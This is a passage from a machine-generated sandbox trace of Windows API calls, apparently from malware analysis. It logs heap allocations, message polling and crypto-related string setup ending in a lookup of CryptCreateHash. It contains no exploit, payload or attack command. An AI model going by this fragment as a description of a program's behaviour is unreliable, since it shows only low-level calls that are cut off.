(HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0158.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0158.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0158.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0158.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0158.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0158.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0158.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0158.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0158.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0158.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0158.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0158.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0158.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0158.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0158.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0158.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0158.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0158.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0158.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0158.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0158.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0158.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0158.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0158.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0158.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0158.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0158.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0158.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0158.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0158.780] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0158.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0158.780] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0158.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0158.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0158.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8a0 [0158.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0158.780] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0158.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0158.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0158.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0158.780] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0158.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0158.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0158.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba0d8 [0158.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0158.780] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0158.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0158.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0158.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0158.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0158.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0158.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0158.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0158.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0158.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0158.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0158.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0158.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0158.781] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0158.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0158.781] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0158.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0158.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0158.781] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0158.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0158.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0158.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba0d8 [0158.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0158.781] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0158.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0158.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0158.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0158.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0158.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0158.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0158.781] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0158.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0158.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0158.782] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0158.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0158.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0158.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0158.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0158.782] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0158.782] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0158.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0158.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0158.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0158.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0158.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0158.782] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0158.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0158.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0158.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba0d8 [0158.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0158.782] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0158.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0158.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0158.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0158.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0158.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0158.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0158.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0158.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0158.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0158.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0158.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0158.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0158.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0158.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0158.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0158.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0158.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0158.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0158.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0158.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0158.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0158.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0158.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0158.783] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0158.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0158.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0158.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9a90 [0158.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0158.784] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0158.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0158.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0158.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0158.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0158.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0158.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0158.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0158.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0158.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0158.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0158.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0158.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0158.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0158.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0158.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0158.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0158.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0158.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0158.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0158.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0158.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0158.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0158.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0158.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0158.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0158.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0158.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0158.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0158.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0158.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0158.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0158.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0158.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0158.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0158.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0158.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0158.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0158.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0158.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0158.785] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0158.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0158.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0158.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0158.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0158.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0158.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0158.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0158.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0158.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0158.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0158.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0158.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0158.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0158.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0158.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0158.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0158.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0158.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0158.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0158.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0158.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0158.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0158.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0158.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0158.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0158.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0158.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0158.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0158.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0158.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0158.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0158.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0158.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0158.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0158.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0158.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0158.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0158.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0158.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0158.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0158.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0158.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0158.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0158.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0158.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0158.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0158.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0158.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0158.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0158.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0158.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0158.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0158.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0158.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0158.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0158.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0158.787] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0158.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0158.788] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x9ba1b0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0158.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0158.788] GetProcAddress (hModule=0x74f20000, lpProcName="CryptCreateHash") returned 0x74f2df4e [0158.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0158.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0158.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, 